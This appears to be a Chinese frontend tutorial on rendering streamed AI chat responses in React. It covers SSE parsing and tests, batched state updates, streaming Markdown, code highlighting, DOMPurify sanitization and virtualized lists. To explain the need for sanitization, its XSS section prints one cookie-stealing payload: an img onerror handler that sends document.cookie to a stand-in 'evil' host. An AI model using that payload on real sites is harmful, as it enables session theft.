文章目录
系列导航
渲染全链路:字节 → 文本 → 状态 → DOM
- 网络层:浏览器从
ReadableStream<Uint8Array>持续读取字节流。 - 解码层:使用
TextDecoder(stream: true)将分片字节解码为连续文本。 - 协议层:按 SSE 规则解析文本行与事件块,提取
data:内容。 - 业务层(缓冲):将多段 delta 先放入缓冲区,按 RAF 或固定间隔批量合并。
- 业务层(状态):把合并后的文本增量写入 zustand 中对应消息的
content。 - 视图层(Markdown):将消息内容做 Markdown 解析并进行安全净化。
- 视图层(高亮):在流式完成后执行代码高亮,避免每个增量都重复高亮。
为何必须 TextDecoder(..., { stream: true })
UTF-8 多字节字符可能被 TCP 分包截断。若每次 decode(value) 默认 stream: false,半个字符可能被替换为 “ 或乱码。
示例(概念):emoji 😀 占 4 字节,第一次 read() 只拿到 2 字节、第二次再拿 2 字节;第二次合并前必须用 stream: true 让解码器保留不完整序列。
const decoder = new TextDecoder();
let buffer = "";
function onChunk(chunk: Uint8Array) {
buffer += decoder.decode(chunk, { stream: true });
// 再按 \n\n 切 SSE
}
流结束时再调用一次 decoder.decode() 无参数 冲刷内部挂起字节。
可测试的 SSE 解析器
把「行缓冲 + data: 提取 + 多行 event」收敛成纯函数,便于 Vitest。
export type SSEHandler = (dataLine: string) => void;
/** 喂入任意片段,内部按 \n 拆行;完整行触发 onLine */
export function createLineParser(onLine: (line: string) => void) {
let buf = "";
return (chunk: string) => {
buf += chunk;
const lines = buf.split("\n");
buf = lines.pop() ?? "";
for (const line of lines) onLine(line);
};
}
/** 将 SSE event 块(已按 \n\n 分开)解析为 data 行合并 */
export function parseSSEBlock(block: string): string | null {
const lines = block.split("\n").map((l) => l.trimEnd());
const dataLines: string[] = [];
for (const line of lines) {
if (line.startsWith(":")) continue; // 注释心跳
if (line.startsWith("data:")) dataLines.push(line.slice(5).trimStart());
}
if (dataLines.length === 0) return null;
return dataLines.join("\n");
}
export function createSSEParser(onDataJson: (raw: string) => void) {
let blockBuf = "";
return (textChunk: string) => {
blockBuf += textChunk;
const parts = blockBuf.split("\n\n");
blockBuf = parts.pop() ?? "";
for (const block of parts) {
const data = parseSSEBlock(block);
if (data != null) onDataJson(data);
}
};
}
Vitest 示例:
import { describe, it, expect, vi } from "vitest";
import { parseSSEBlock, createSSEParser } from "./sseParser";
describe("parseSSEBlock", () => {
it("joins multi-line data", () => {
const block = "event: msg\ndata: {\"a\":1}\ndata: line2\n";
expect(parseSSEBlock(block)).toBe('{"a":1}\nline2');
});
});
describe("createSSEParser", () => {
it("emits two JSON payloads", () => {
const spy = vi.fn();
const feed = createSSEParser((raw) => spy(JSON.parse(raw)));
feed('data: {"type":"delta","text":"a"}\n\n');
feed('data: {"type":"done"}\n\n');
expect(spy).toHaveBeenNthCalledWith(1, { type: "delta", text: "a" });
expect(spy).toHaveBeenNthCalledWith(2, { type: "done" });
});
});
外层循环仍是:buffer += decoder.decode(...); sseParser(buffer 增量) —— 可把 blockBuf 与 decoder 组合在一个 readLoop 里(第二篇已给雏形,此处强调双缓冲:字节解码缓冲 + SSE 块缓冲)。
useStreamBuffer:按帧合并 delta
避免每个 token setState 触发整树 reconcile:
import { useCallback, useEffect, useRef } from "react";
export function useStreamBuffer(onFlush: (merged: string) => void) {
const pending = useRef("");
const raf = useRef<number | null>(null);
const flush = useCallback(() => {
if (!pending.current) return;
const chunk = pending.current;
pending.current = "";
onFlush(chunk);
raf.current = null;
}, [onFlush]);
const push = useCallback(
(delta: string) => {
pending.current += delta;
if (raf.current == null) {
raf.current = requestAnimationFrame(flush);
}
},
[flush]
);
useEffect(() => () => {
if (raf.current != null) cancelAnimationFrame(raf.current);
}, []);
return { push, flushNow: flush };
}
在 SSE onEvent 里对 type==='delta' 调用 push(text),在 done 时先 flushNow() 再更新 status。
Profiler 对比(文字结论):逐 token 更新在 2k token 场景下容易上千次 commit;RAF 合并通常压到每秒数十次,主线程时间与布局次数明显下降。
流式 Markdown:边界补丁 safeRenderMarkdown
流式中途常见「半个代码围栏、半个链接」。策略:
- 奇数个
→ 临时追加闭合仅用于本次 parse,不写回 store。 - 行内未闭合
`:可追加尾部`。 - 未闭合链接
[text:不要交给 marked 当链接,整体当普通文本(或 escape)。
function balanceFences(src: string): string {
const matches = src.match(/```/g);
if (matches && matches.length % 2 === 1) return `${src}\n\`\`\``;
return src;
}
export function safeRenderMarkdown(isStreaming: boolean, raw: string): string {
if (!isStreaming) return raw;
return balanceFences(raw);
}
表格、LaTeX 等更复杂语法可继续加规则,或流式阶段仅用轻量渲染(换行+粗体),
done后全量 marked。
代码高亮策略:流式 vs 完成
- streaming:代码块用
<pre><code>+ 等宽字体,不跑 highlight.js(增量全文 re-highlight 是 CPU 热点)。 - completed:对完整 fenced block 调用
hljs.highlight。
import { memo, useMemo } from "react";
import { marked } from "marked";
import hljs from "highlight.js";
import DOMPurify from "dompurify";
marked.setOptions({ gfm: true, breaks: true });
const renderer = new marked.Renderer();
renderer.code = ({ text, lang }) => {
const language = lang && hljs.getLanguage(lang) ? lang : "plaintext";
const highlighted = hljs.highlight(text, { language }).value;
return `<pre class="hljs"><code class="language-${language}">${highlighted}</code></pre>`;
};
type Props = { content: string; isStreaming: boolean };
export const MarkdownRenderer = memo(function MarkdownRenderer({
content,
isStreaming,
}: Props) {
const html = useMemo(() => {
const src = safeRenderMarkdown(isStreaming, content);
if (isStreaming) {
const plain = marked.parse(src, { async: false, renderer: undefined }) as string;
return DOMPurify.sanitize(plain);
}
marked.use({ renderer });
const rich = marked.parse(src, { async: false }) as string;
return DOMPurify.sanitize(rich);
}, [content, isStreaming]);
return <div className="markdown-body" dangerouslySetInnerHTML={{ __html: html }} />;
});
流式分支可换「不加 renderer」的简化 parse;关键是 sanitize 永远最后一步,防止模型输出 <img onerror=...>。
XSS 为何必须防
模型可能被诱导输出:
<img src=x onerror="fetch('https://evil?c='+document.cookie)">
DOMPurify.sanitize 默认剥离事件属性。若允许 a[href],需限制协议(javascript: 禁用)。
列表性能:虚拟化
长会话用 @tanstack/react-virtual:
import { useVirtualizer } from "@tanstack/react-virtual";
export function MessageList({ messages, parentRef }: { messages: unknown[]; parentRef: React.RefObject<HTMLDivElement | null> }) {
const rowVirtualizer = useVirtualizer({
count: messages.length,
getScrollElement: () => parentRef.current,
estimateSize: () => 72,
overscan: 6,
});
return (
<div style={{ height: rowVirtualizer.getTotalSize(), position: "relative" }}>
{rowVirtualizer.getVirtualItems().map((vi) => (
<div
key={vi.key}
style={{
position: "absolute",
top: 0,
left: 0,
width: "100%",
transform: `translateY(${vi.start}px)`,
}}
>
{/* MessageBubble */}
</div>
))}
</div>
);
}
每条 MessageBubble 用 message.id 做 key,避免 index key 在插入时导致子树重建。
自动滚动与用户「上滑取消跟随」
const containerRef = useRef<HTMLDivElement>(null);
const stickToBottom = useRef(true);
useEffect(() => {
const el = containerRef.current;
if (!el || !stickToBottom.current) return;
el.scrollTo({ top: el.scrollHeight, behavior: "instant" as ScrollBehavior });
}, [messages]);
function onScroll() {
const el = containerRef.current;
if (!el) return;
const threshold = 80;
const atBottom = el.scrollHeight - el.scrollTop - el.clientHeight < threshold;
stickToBottom.current = atBottom;
}
打字机效果:选 A 还是选 B
| 方案 | 做法 | 适用 |
|---|---|---|
| A | 直接展示 store 里累积的 content | 默认推荐,SSE 本身就是打字机 |
| B | 本地再维护 char 队列逐字显示 | 非流式一次性返回、或产品要求「匀速」与网络解耦 |
B 的最小队列(节选):
const [shown, setShown] = useState("");
const target = useRef("");
useEffect(() => {
target.current = fullContentFromParent;
}, [fullContentFromParent]);
useEffect(() => {
const id = window.setInterval(() => {
setShown((s) => {
if (s.length >= target.current.length) return s;
return target.current.slice(0, s.length + 2);
});
}, 30);
return () => clearInterval(id);
}, []);
小结
- 解码:
TextDecoder必须用stream: true,结束再 flush。 - 更新:RAF / 定时批量合并 delta,减轻 React commit 压力。
- Markdown:流式用补丁 + 简化高亮;完成后全量 marked + hljs + DOMPurify。
- 列表:虚拟列表 + 稳定
key+ 可关闭的粘底滚动。
下一篇:中断、错误处理、超时与防抖。